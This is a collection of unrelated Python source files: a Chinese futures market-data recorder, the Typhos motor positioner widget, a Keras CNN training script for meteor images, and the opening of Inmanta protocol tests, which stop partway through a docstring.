CTP_SETTING = load_json("connect_ctp.json")
def is_futures(vt_symbol: str) -> bool:
"""
Return whether the given vt_symbol is a futures contract.
"""
return bool(re.match(r"^[a-zA-Z]{1,3}\d{2,4}.[A-Z]+$", vt_symbol))
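# A minimal sketch showing what the regex above accepts: plain futures codes
# match, while option codes (which contain hyphens) do not. The contract
# codes are only illustrative.
def _demo_is_futures():
    assert is_futures("rb2105.SHFE")           # futures contract -> recorded
    assert not is_futures("m2009-C-2100.DCE")  # option contract -> skipped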
class RecordMode(Enum):
BAR = "bar"
TICK = "tick"
class WholeMarketRecorder(RecorderEngine):
def __init__(self, main_engine, event_engine, record_modes=[RecordMode.BAR]):
super().__init__(main_engine, event_engine)
self.record_modes = record_modes
# Non-trading hours
self.drop_start = time(3, 15)
self.drop_end = time(8, 45)
# Mid-session break on the Dalian, Shanghai and Zhengzhou exchanges
self.rest_start = time(10, 15)
self.rest_end = time(10, 30)
def is_trading(self, vt_symbol, current_time) -> bool:
"""
Check whether current_time falls within trading hours; used to filter ticks.
"""
symbol, exchange = extract_vt_symbol(vt_symbol)
if self.drop_start <= current_time < self.drop_end:
return False
if exchange in [Exchange.DCE, Exchange.SHFE, Exchange.CZCE]:
if self.rest_start <= current_time < self.rest_end:
return False
return True
def load_setting(self):
pass
def record_tick(self, tick: TickData):
"""
Discard tick data received outside trading hours.
"""
tick_time = tick.datetime.time()
if not self.is_trading(tick.vt_symbol, tick_time):
return
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
"""
Discard bar data received outside trading hours.
"""
bar_time = bar.datetime.time()
if not self.is_trading(bar.vt_symbol, bar_time):
return
task = ("bar", copy(bar))
self.queue.put(task)
def process_contract_event(self, event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
# Do not record options
if is_futures(vt_symbol):
if RecordMode.BAR in self.record_modes:
self.add_bar_recording(vt_symbol)
if RecordMode.TICK in self.record_modes:
self.add_tick_recording(vt_symbol)
self.subscribe(contract)
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
main_engine.write_log("主引擎创建成功")
# 记录引擎
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(CTP_SETTING, "CTP")
main_engine.write_log("连接CTP接口")
whole_market_recorder = WholeMarketRecorder(main_engine, event_engine)
main_engine.write_log("开始录制数据")
oms_engine = main_engine.get_engine("oms")
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
MORNING_START = time(8, 45)
MORNING_END = time(12, 0)
AFTERNOON_START = time(12, 45)
AFTERNOON_END = time(15, 35)
NIGHT_START = time(20, 45)
NIGHT_END = time(3, 5)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= MORNING_START and current_time <= MORNING_END)
or (current_time >= AFTERNOON_START and current_time <= AFTERNOON_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
print("启动数据录制子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("数据录制子进程启动成功")
# 非记录时间则退出数据录制子进程
if not trading and child_process is not None:
print("关闭数据录制子进程")
child_process.terminate()
child_process.join()
child_process = None
print("数据录制子进程关闭成功")
sys.stdout.flush()
sleep(5)
if __name__ == "__main__":
run_parent()
|
positioner.py
|
import logging
import os.path
import threading
from pydm.widgets.channel import PyDMChannel
from qtpy import QtCore, QtWidgets, uic
from . import utils, widgets
from .status import TyphosStatusThread
logger = logging.getLogger(__name__)
class TyphosPositionerWidget(utils.TyphosBase, widgets.TyphosDesignerMixin):
"""
Widget to interact with a :class:`ophyd.Positioner`.
Standard positioner motion requires a large amount of context for
operators. For most motors, it may not be enough to simply have a text
field where setpoints can be punched in. Instead, information like soft
limits and hardware limit switches are crucial for a full understanding of
the position and behavior of a motor. The widget will work with any object
that implements the method ``set``, however to get other relevant
information, we see if we can find other useful signals. Below is a table
of attributes that the widget looks for to inform screen design.
============== ===========================================================
Widget         Attribute Selection
============== ===========================================================
User Readback  The ``readback_attribute`` property is used, which defaults
               to ``user_readback``. Linked to UI element
               ``user_readback``.
User Setpoint  The ``setpoint_attribute`` property is used, which defaults
               to ``user_setpoint``. Linked to UI element
               ``user_setpoint``.
Limit Switches The ``low_limit_switch_attribute`` and
               ``high_limit_switch_attribute`` properties are used, which
               default to ``low_limit_switch`` and ``high_limit_switch``,
               respectively.
Soft Limits    The ``low_limit_travel_attribute`` and
               ``high_limit_travel_attribute`` properties are used, which
               default to ``low_limit_travel`` and ``high_limit_travel``,
               respectively. As a fallback, the ``limit`` property on the
               device may be queried directly.
Set and Tweak  Both of these methods simply use ``Device.set`` which is
               expected to take a ``float`` and return a ``status`` object
               that indicates the motion completeness. Must be implemented.
Stop           ``Device.stop()``, if available, otherwise hide the button.
               If you have a non-functional ``stop`` method inherited from
               a parent device, you can hide it from ``typhos`` by
               overriding it with a property that raises
               ``AttributeError`` on access.
Move Indicator The ``moving_attribute`` property is used, which defaults
               to ``motor_is_moving``. Linked to UI element
               ``moving_indicator``.
Error Message  The ``error_message_attribute`` property is used, which
               defaults to ``error_message``. Linked to UI element
               ``error_label``.
Clear Error    ``Device.clear_error()``, if applicable. This also clears
               any visible error messages from the status returned by
               ``Device.set``.
Alarm Circle   Uses the ``TyphosAlarmCircle`` widget to summarize the
               alarm state of all of the device's ``normal`` and
               ``hinted`` signals.
============== ===========================================================
"""
ui_template = os.path.join(utils.ui_dir, 'widgets', 'positioner.ui')
_readback_attr = 'user_readback'
_setpoint_attr = 'user_setpoint'
_low_limit_switch_attr = 'low_limit_switch'
_high_limit_switch_attr = 'high_limit_switch'
_low_limit_travel_attr = 'low_limit_travel'
_high_limit_travel_attr = 'high_limit_travel'
_velocity_attr = 'velocity'
_acceleration_attr = 'acceleration'
_moving_attr = 'motor_is_moving'
_error_message_attr = 'error_message'
_min_visible_operation = 0.1
def __init__(self, parent=None):
self._moving = False
self._last_move = None
self._readback = None
self._setpoint = None
self._status_thread = None
self._initialized = False
self._moving_channel = None
super().__init__(parent=parent)
self.ui = uic.loadUi(self.ui_template, self)
self.ui.tweak_positive.clicked.connect(self.positive_tweak)
self.ui.tweak_negative.clicked.connect(self.negative_tweak)
self.ui.stop_button.clicked.connect(self.stop)
self.ui.clear_error_button.clicked.connect(self.clear_error)
self.ui.alarm_circle.kindLevel = self.ui.alarm_circle.NORMAL
self.ui.alarm_circle.alarm_changed.connect(self.update_alarm_text)
self.show_expert_button = False
self._after_set_moving(False)
def _clear_status_thread(self):
"""Clear a previous status thread."""
if self._status_thread is None:
return
logger.debug("Clearing current active status")
self._status_thread.disconnect()
self._status_thread = None
def _start_status_thread(self, status, timeout):
"""Start the status monitoring thread for the given status object."""
self._status_thread = thread = TyphosStatusThread(
status, start_delay=self._min_visible_operation,
timeout=timeout
)
thread.status_started.connect(self.move_changed)
thread.status_finished.connect(self._status_finished)
thread.start()
def _get_timeout(self, set_position, settle_time):
"""Use positioner's configuration to select a timeout."""
pos_sig = getattr(self.device, self._readback_attr, None)
vel_sig = getattr(self.device, self._velocity_attr, None)
acc_sig = getattr(self.device, self._acceleration_attr, None)
# Not enough info == no timeout
if pos_sig is None or vel_sig is None:
return None
delta = pos_sig.get() - set_position
speed = vel_sig.get()
# Bad speed == no timeout
if speed == 0:
return None
# Bad acceleration == ignore acceleration
if acc_sig is None:
acc_time = 0
else:
acc_time = acc_sig.get()
# This time is always greater than the kinematic calc
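# Worked example (hypothetical numbers): a 10 unit move at 2 units/s with a
# 0.5 s acceleration time and a 5 s settle time gives
# abs(10 / 2) + 2 * abs(0.5) + abs(5) = 11 seconds.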
return abs(delta/speed) + 2 * abs(acc_time) + abs(settle_time)
def _set(self, value):
"""Inner `set` routine - call device.set() and monitor the status."""
self._clear_status_thread()
self._last_move = None
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
set_position = value
else:
set_position = float(value)
try:
timeout = self._get_timeout(set_position, 5)
except Exception:
# Something went wrong, just run without a timeout.
logger.exception('Unable to estimate motor timeout.')
timeout = None
logger.debug("Setting device %r to %r with timeout %r",
self.device, value, timeout)
# Send timeout through thread because status timeout stops the move
status = self.device.set(set_position)
self._start_status_thread(status, timeout)
@QtCore.Slot(int)
def combo_set(self, index):
self.set()
@QtCore.Slot()
def set(self):
"""Set the device to the value configured by ``ui.set_value``"""
if not self.device:
return
try:
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
value = self.ui.set_value.currentText()
else:
value = self.ui.set_value.text()
self._set(value)
except Exception as exc:
logger.exception("Error setting %r to %r", self.devices, value)
self._last_move = False
utils.reload_widget_stylesheet(self, cascade=True)
utils.raise_to_operator(exc)
def tweak(self, offset):
"""Tweak by the given ``offset``."""
try:
setpoint = self._get_position() + float(offset)
except Exception:
logger.exception('Tweak failed')
return
self.ui.set_value.setText(str(setpoint))
self.set()
@QtCore.Slot()
def positive_tweak(self):
"""Tweak positive by the amount listed in ``ui.tweak_value``"""
try:
self.tweak(float(self.tweak_value.text()))
except Exception:
logger.exception('Tweak failed')
@QtCore.Slot()
def negative_tweak(self):
"""Tweak negative by the amount listed in ``ui.tweak_value``"""
try:
self.tweak(-float(self.tweak_value.text()))
except Exception:
logger.exception('Tweak failed')
@QtCore.Slot()
def stop(self):
"""Stop device"""
for device in self.devices:
device.stop()
@QtCore.Slot()
def clear_error(self):
"""
Clear the error messages from the device and screen.
The device may have errors in the IOC. These will be cleared by calling
the clear_error method.
The screen may have errors from the status of the last move. These will
be cleared from view.
"""
for device in self.devices:
clear_error_in_background(device)
self._set_status_text('')
# This variable holds True if last move was good, False otherwise
# It also controls whether or not we have a red box on the widget
# False = Red, True = Green, None = no box (in motion is yellow)
if not self._last_move:
self._last_move = None
utils.reload_widget_stylesheet(self, cascade=True)
def _get_position(self):
if not self._readback:
raise Exception("No Device configured for widget!")
return self._readback.get()
@utils.linked_attribute('readback_attribute', 'ui.user_readback', True)
def _link_readback(self, signal, widget):
"""Link the positioner readback with the ui element."""
self._readback = signal
@utils.linked_attribute('setpoint_attribute', 'ui.user_setpoint', True)
def _link_setpoint(self, signal, widget):
"""Link the positioner setpoint with the ui element."""
self._setpoint = signal
if signal is not None:
# Seed the set_value text with the user_setpoint channel value.
if hasattr(widget, 'textChanged'):
widget.textChanged.connect(self._user_setpoint_update)
@utils.linked_attribute('low_limit_switch_attribute',
'ui.low_limit_switch', True)
def _link_low_limit_switch(self, signal, widget):
"""Link the positioner lower limit switch with the ui element."""
if signal is None:
widget.hide()
@utils.linked_attribute('high_limit_switch_attribute',
'ui.high_limit_switch', True)
def _link_high_limit_switch(self, signal, widget):
"""Link the positioner high limit switch with the ui element."""
if signal is None:
widget.hide()
@utils.linked_attribute('low_limit_travel_attribute', 'ui.low_limit', True)
def _link_low_travel(self, signal, widget):
"""Link the positioner lower travel limit with the ui element."""
return signal is not None
@utils.linked_attribute('high_limit_travel_attribute', 'ui.high_limit',
True)
def _link_high_travel(self, signal, widget):
"""Link the positioner high travel limit with the ui element."""
return signal is not None
def _link_limits_by_limits_attr(self):
"""Link limits by using ``device.limits``."""
device = self.device
try:
low_limit, high_limit = device.limits
except Exception:
...
else:
if low_limit < high_limit:
self.ui.low_limit.setText(str(low_limit))
self.ui.high_limit.setText(str(high_limit))
return
# If not found or invalid, hide them:
self.ui.low_limit.hide()
self.ui.high_limit.hide()
@utils.linked_attribute('moving_attribute', 'ui.moving_indicator', True)
def _link_moving(self, signal, widget):
"""Link the positioner moving indicator with the ui element."""
if signal is None:
widget.hide()
return False
widget.show()
# Additional handling for updating self.moving
if self._moving_channel is not None:
self._moving_channel.disconnect()
chname = utils.channel_from_signal(signal)
self._moving_channel = PyDMChannel(
address=chname,
value_slot=self._set_moving,
)
self._moving_channel.connect()
return True
@utils.linked_attribute('error_message_attribute', 'ui.error_label', True)
def _link_error_message(self, signal, widget):
"""Link the IOC error message with the ui element."""
if signal is None:
widget.hide()
def _define_setpoint_widget(self):
"""
Leverage information at describe to define whether to use a
PyDMLineEdit or a PyDMEnumCombobox as setpoint widget.
"""
try:
setpoint_signal = getattr(self.device, self.setpoint_attribute)
selection = setpoint_signal.enum_strs is not None
except Exception:
selection = False
if selection:
self.ui.set_value = widgets.NoScrollComboBox()
self.ui.set_value.addItems(setpoint_signal.enum_strs)
# Activated signal triggers only when the user selects an option
self.ui.set_value.activated.connect(self.set)
self.ui.set_value.setSizePolicy(
QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Fixed,
)
self.ui.set_value.setMinimumContentsLength(20)
self.ui.tweak_widget.setVisible(False)
else:
self.ui.set_value = QtWidgets.QLineEdit()
self.ui.set_value.setAlignment(QtCore.Qt.AlignCenter)
self.ui.set_value.returnPressed.connect(self.set)
self.ui.setpoint_layout.addWidget(self.ui.set_value)
@property
def device(self):
"""The associated device."""
try:
return self.devices[0]
except Exception:
...
def add_device(self, device):
"""Add a device to the widget"""
# Add device to cache
self.devices.clear() # only one device allowed
super().add_device(device)
self._define_setpoint_widget()
self._link_readback()
self._link_setpoint()
self._link_low_limit_switch()
self._link_high_limit_switch()
# If the stop method is missing, hide the button
try:
device.stop
self.ui.stop_button.show()
except AttributeError:
self.ui.stop_button.hide()
if not (self._link_low_travel() and self._link_high_travel()):
self._link_limits_by_limits_attr()
if self._link_moving():
self.ui.moving_indicator_label.show()
else:
self.ui.moving_indicator_label.hide()
self._link_error_message()
if self.show_expert_button:
self.ui.expert_button.devices.clear()
self.ui.expert_button.add_device(device)
self.ui.alarm_circle.clear_all_alarm_configs()
self.ui.alarm_circle.add_device(device)
@QtCore.Property(bool, designable=False)
def moving(self):
"""
Current moving state of the widget.
This will lag behind the actual state of the positioner in order to
prevent unnecessary rapid changes of the indicator.
"""
return self._moving
@moving.setter
def moving(self, value):
if value != self._moving:
self._moving = value
self._after_set_moving(value)
def _after_set_moving(self, value):
"""
Common updates needed after a change to the moving state.
This is pulled out as a separate method because we need
to initialize the label here during __init__ without
modifying self.moving.
"""
utils.reload_widget_stylesheet(self, cascade=True)
if value:
self.ui.moving_indicator_label.setText('moving')
else:
self.ui.moving_indicator_label.setText('done')
def _set_moving(self, value):
"""
Slot for updating the self.moving property.
This is used e.g. in updating the moving state when the
motor starts moving in EPICS but not by the request of
this widget.
"""
self.moving = bool(value)
@QtCore.Property(bool, designable=False)
def successful_move(self):
"""The last requested move was successful"""
return self._last_move is True
@QtCore.Property(bool, designable=False)
def failed_move(self):
"""The last requested move failed"""
return self._last_move is False
@QtCore.Property(str, designable=True)
def readback_attribute(self):
"""The attribute name for the readback signal."""
return self._readback_attr
@readback_attribute.setter
def readback_attribute(self, value):
self._readback_attr = value
@QtCore.Property(str, designable=True)
def setpoint_attribute(self):
"""The attribute name for the setpoint signal."""
return self._setpoint_attr
@setpoint_attribute.setter
def setpoint_attribute(self, value):
self._setpoint_attr = value
@QtCore.Property(str, designable=True)
def low_limit_switch_attribute(self):
"""The attribute name for the low limit switch signal."""
return self._low_limit_switch_attr
@low_limit_switch_attribute.setter
def low_limit_switch_attribute(self, value):
self._low_limit_switch_attr = value
@QtCore.Property(str, designable=True)
def high_limit_switch_attribute(self):
"""The attribute name for the high limit switch signal."""
return self._high_limit_switch_attr
@high_limit_switch_attribute.setter
def high_limit_switch_attribute(self, value):
self._high_limit_switch_attr = value
@QtCore.Property(str, designable=True)
def low_limit_travel_attribute(self):
"""The attribute name for the low limit signal."""
return self._low_limit_travel_attr
@low_limit_travel_attribute.setter
def low_limit_travel_attribute(self, value):
self._low_limit_travel_attr = value
@QtCore.Property(str, designable=True)
def high_limit_travel_attribute(self):
"""The attribute name for the high (soft) limit travel signal."""
return self._high_limit_travel_attr
@high_limit_travel_attribute.setter
def high_limit_travel_attribute(self, value):
self._high_limit_travel_attr = value
@QtCore.Property(str, designable=True)
def velocity_attribute(self):
"""The attribute name for the velocity signal."""
return self._velocity_attr
@velocity_attribute.setter
def velocity_attribute(self, value):
self._velocity_attr = value
@QtCore.Property(str, designable=True)
def acceleration_attribute(self):
"""The attribute name for the acceleration time signal."""
return self._acceleration_attr
@acceleration_attribute.setter
def acceleration_attribute(self, value):
self._acceleration_attr = value
@QtCore.Property(str, designable=True)
def moving_attribute(self):
"""The attribute name for the motor moving indicator."""
return self._moving_attr
@moving_attribute.setter
def moving_attribute(self, value):
self._moving_attr = value
@QtCore.Property(str, designable=True)
def error_message_attribute(self):
"""The attribute name for the IOC error message label."""
return self._error_message_attr
@error_message_attribute.setter
def error_message_attribute(self, value):
self._error_message_attr = value
@QtCore.Property(bool, designable=True)
def show_expert_button(self):
"""
If True, show the expert button.
The expert button opens a full suite for the device.
You typically want this False when you're already inside the
suite that the button would open.
You typically want this True when you're using the positioner widget
inside of an unrelated screen.
This will default to False.
"""
return self._show_expert_button
@show_expert_button.setter
def show_expert_button(self, show):
self._show_expert_button = show
if show:
self.ui.expert_button.show()
else:
self.ui.expert_button.hide()
def move_changed(self):
"""Called when a move is begun"""
logger.debug("Begin showing move in TyphosPositionerWidget")
self.moving = True
def _set_status_text(self, text, *, max_length=60):
"""Set the status text label to ``text``."""
if len(text) >= max_length:
self.ui.status_label.setToolTip(text)
text = text[:max_length] + '...'
else:
self.ui.status_label.setToolTip('')
self.ui.status_label.setText(text)
def _status_finished(self, result):
"""Called when a move is complete."""
if isinstance(result, Exception):
text = f'<b>{result.__class__.__name__}</b> {result}'
else:
text = ''
self._set_status_text(text)
success = not isinstance(result, Exception)
logger.debug("Completed move in TyphosPositionerWidget (result=%r)",
result)
self._last_move = success
self.moving = False
@QtCore.Slot(str)
def _user_setpoint_update(self, text):
"""Qt slot - indicating the ``user_setpoint`` widget text changed."""
try:
text = text.strip().split(' ')[0]
text = text.strip()
except Exception:
return
# Update set_value if it's not being edited.
if not self.ui.set_value.hasFocus():
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
try:
idx = int(text)
self.ui.set_value.setCurrentIndex(idx)
self._initialized = True
except ValueError:
logger.debug('Failed to convert value to int. %s', text)
else:
self._initialized = True
self.ui.set_value.setText(text)
def update_alarm_text(self, alarm_level):
"""
Label the alarm circle with a short status string.
"""
alarms = self.ui.alarm_circle.AlarmLevel
if alarm_level == alarms.NO_ALARM:
text = 'no alarm'
elif alarm_level == alarms.MINOR:
text = 'minor'
elif alarm_level == alarms.MAJOR:
text = 'major'
elif alarm_level == alarms.DISCONNECTED:
text = 'no conn'
else:
text = 'invalid'
self.ui.alarm_label.setText(text)
def clear_error_in_background(device):
def inner():
try:
device.clear_error()
except AttributeError:
pass
except Exception:
msg = "Could not clear error!"
logger.error(msg)
logger.debug(msg, exc_info=True)
td = threading.Thread(target=inner)
td.start()
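
# --- Illustrative sketch (not part of the widget code above) ---
# The QtCore.Property definitions above expose the signal names as plain strings,
# so the widget can also be configured programmatically before a device is attached.
# ``motor`` is assumed to be an ophyd-style positioner; the attribute names used here
# ('user_readback', 'user_setpoint', 'motor_is_moving') are typical EPICS motor
# components and are only an example, not a requirement of the widget.
def _example_configure_positioner_widget(motor):
    widget = TyphosPositionerWidget()
    widget.readback_attribute = 'user_readback'
    widget.setpoint_attribute = 'user_setpoint'
    widget.moving_attribute = 'motor_is_moving'
    widget.show_expert_button = False
    widget.add_device(motor)
    return widget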
|
model_2_01.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN():
tf.keras.backend.clear_session()
ImageResolution = (640, 360)
ImageResolutionGrayScale = (640, 360, 1)
modelNumber = 'model_2_01'
base_dir = r'C:\work_dir\meteorData\extraData_70_30'
results_dir = join(r'G:\GIEyA\TFG\meteor_classification\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=16,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=16,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
model = tf.keras.models.Sequential([
Conv2D(16, (11, 11), activation='relu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.25),
Conv2D(12, (7, 7), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.25),
Conv2D(12, (5, 5), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.25),
Conv2D(12, (3, 3), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.50),
Flatten(),
Dense(480, activation='relu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(16, activation='relu', kernel_initializer='he_uniform'),
Dropout(0.20),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:6]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:6] + '.h5'), save_format='h5')
callback_90_84 = SaveModelCallback(0.900, 0.840)
# Training set   -> 62483 images (62483 // 16 = 3905 steps per epoch)
# Validation set -> 26780 images (26780 // 16 = 1673 validation steps)
model.load_weights(r'G:\GIEyA\TFG\meteor_classification\results\weights\model_19\model_19_acc_0.9297_val_acc0.8577.h5')
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=3905,
epochs=10, # Later train with more epochs if necessary
validation_steps=1673,
shuffle=True,
verbose=1,
callbacks=[callback_90_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.5)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
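
# Illustrative sketch (not part of the original script): the hard-coded
# steps_per_epoch / validation_steps above are simply the number of images divided
# by the batch size (62483 // 16 == 3905, 26780 // 16 == 1673). A helper like this
# could derive them from the directory contents instead; the directory layout is
# assumed to be the one consumed by flow_from_directory (one sub-directory per class).
def stepsForDirectory(directory, batch_size=16):
    import os
    num_images = sum(len(files) for _, _, files in os.walk(directory))
    return num_images // batch_size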
|
test_protocol.py
|
"""
Copyright 2018 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: code@inmanta.com
"""
import asyncio
import base64
import datetime
import json
import os
import random
import threading
import time
import urllib.parse
import uuid
from enum import Enum
from itertools import chain
from typing import Any, Dict, Iterator, List, Optional, Union
import pydantic
import pytest
import tornado
from pydantic.types import StrictBool
from tornado import gen, web
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
from tornado.httputil import url_concat
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from inmanta import config, const, protocol
from inmanta.data.model import BaseModel
from inmanta.protocol import VersionMatch, exceptions, json_encode
from inmanta.protocol.common import (
HTML_CONTENT,
HTML_CONTENT_WITH_UTF8_CHARSET,
OCTET_STREAM_CONTENT,
ZIP_CONTENT,
ArgOption,
InvalidMethodDefinition,
InvalidPathException,
MethodProperties,
Result,
ReturnValue,
)
from inmanta.protocol.methods import ENV_OPTS
from inmanta.protocol.rest import CallArguments
from inmanta.protocol.return_value_meta import ReturnValueWithMeta
from inmanta.server import config as opt
from inmanta.server.config import server_bind_port
from inmanta.server.protocol import Server, ServerSlice
from inmanta.types import Apireturn
from inmanta.util import hash_file
from utils import configure
def make_random_file(size=0):
"""
Generate a random file.
:param size: If size > 0, generate content that is at least ``size`` bytes long.
"""
randomvalue = str(random.randint(0, 10000))
if size > 0:
while len(randomvalue) < size:
randomvalue += randomvalue
content = ("Hello world %s\n" % (randomvalue)).encode()
hash = hash_file(content)
body = base64.b64encode(content).decode("ascii")
return (hash, content, body)
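
# Illustrative sketch (not one of the tests below): the tuple returned by
# make_random_file is internally consistent -- decoding the base64 body gives back
# the raw content, and hashing that content reproduces the id used in the file API
# calls of the tests.
def _make_random_file_invariants():
    hash, content, body = make_random_file(size=16)
    assert base64.b64decode(body) == content
    assert hash_file(content) == hash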
@pytest.mark.asyncio
async def test_client_files(client):
(hash, content, body) = make_random_file()
# Check if the file exists
result = await client.stat_file(id=hash)
assert result.code == 404
# Create the file
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
# Get the file
result = await client.get_file(id=hash)
assert result.code == 200
assert "content" in result.result
assert result.result["content"] == body
@pytest.mark.asyncio
async def test_client_files_lost(client):
(hash, content, body) = make_random_file()
# Get the file
result = await client.get_file(id=hash)
assert result.code == 404
@pytest.mark.asyncio
async def test_sync_client_files(client):
# workaround for https://github.com/pytest-dev/pytest-asyncio/issues/168
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
done = []
limit = 100
sleep = 0.01
def do_test():
sync_client = protocol.SyncClient("client")
(hash, content, body) = make_random_file()
# Check if the file exists
result = sync_client.stat_file(id=hash)
assert result.code == 404
# Create the file
result = sync_client.upload_file(id=hash, content=body)
assert result.code == 200
# Get the file
result = sync_client.get_file(id=hash)
assert result.code == 200
assert "content" in result.result
assert result.result["content"] == body
done.append(True)
thread = threading.Thread(target=do_test)
thread.start()
while len(done) == 0 and limit > 0:
await gen.sleep(sleep)
limit -= 1
thread.join()
assert len(done) > 0
@pytest.mark.asyncio
async def test_client_files_stat(client):
file_names = []
i = 0
while i < 10:
(hash, content, body) = make_random_file()
if hash not in file_names:
file_names.append(hash)
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
i += 1
result = await client.stat_files(files=file_names)
assert len(result.result["files"]) == 0
other_files = ["testtest"]
result = await client.stat_files(files=file_names + other_files)
assert len(result.result["files"]) == len(other_files)
@pytest.mark.asyncio
async def test_diff(client):
ca = "Hello world\n".encode()
ha = hash_file(ca)
result = await client.upload_file(id=ha, content=base64.b64encode(ca).decode("ascii"))
assert result.code == 200
cb = "Bye bye world\n".encode()
hb = hash_file(cb)
result = await client.upload_file(id=hb, content=base64.b64encode(cb).decode("ascii"))
assert result.code == 200
diff = await client.diff(ha, hb)
assert diff.code == 200
assert len(diff.result["diff"]) == 5
diff = await client.diff(0, hb)
assert diff.code == 200
assert len(diff.result["diff"]) == 4
diff = await client.diff(ha, 0)
assert diff.code == 200
assert len(diff.result["diff"]) == 4
@pytest.mark.asyncio
async def test_client_files_bad(server, client):
(hash, content, body) = make_random_file()
# Create the file
result = await client.upload_file(id=hash + "a", content=body)
assert result.code == 400
@pytest.mark.asyncio
async def test_client_files_corrupt(client):
(hash, content, body) = make_random_file()
# Create the file
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
state_dir = opt.state_dir.get()
file_dir = os.path.join(state_dir, "server", "files")
file_name = os.path.join(file_dir, hash)
with open(file_name, "wb+") as fd:
fd.write("Haha!".encode())
opt.server_delete_currupt_files.set("false")
result = await client.get_file(id=hash)
assert result.code == 500
result = await client.upload_file(id=hash, content=body)
assert result.code == 500
opt.server_delete_currupt_files.set("true")
result = await client.get_file(id=hash)
assert result.code == 500
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
@pytest.mark.asyncio
async def test_gzip_encoding(server):
"""
Test if the server accepts gzipped encoding and returns gzipped encoding.
"""
(hash, content, body) = make_random_file(size=1024)
port = opt.get_bind_port()
url = "http://localhost:%s/api/v1/file/%s" % (port, hash)
zipped, body = protocol.gzipped_json({"content": body})
assert zipped
request = HTTPRequest(
url=url,
method="PUT",
headers={"Accept-Encoding": "gzip", "Content-Encoding": "gzip"},
body=body,
decompress_response=True,
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
request = HTTPRequest(url=url, method="GET", headers={"Accept-Encoding": "gzip"}, decompress_response=True)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
assert response.headers["X-Consumed-Content-Encoding"] == "gzip"
class MainHandler(web.RequestHandler):
def get(self):
time.sleep(1.1)
@pytest.fixture(scope="function")
async def app(unused_tcp_port):
http_app = web.Application([(r"/api/v1/file/abc", MainHandler)])
server = tornado.httpserver.HTTPServer(http_app)
server.bind(unused_tcp_port)
server.start()
yield server
server.stop()
await server.close_all_connections()
@pytest.mark.asyncio(timeout=30)
async def test_timeout_error(app):
"""
This test verifies that the protocol client can handle requests that time out. In that case it receives an HTTP
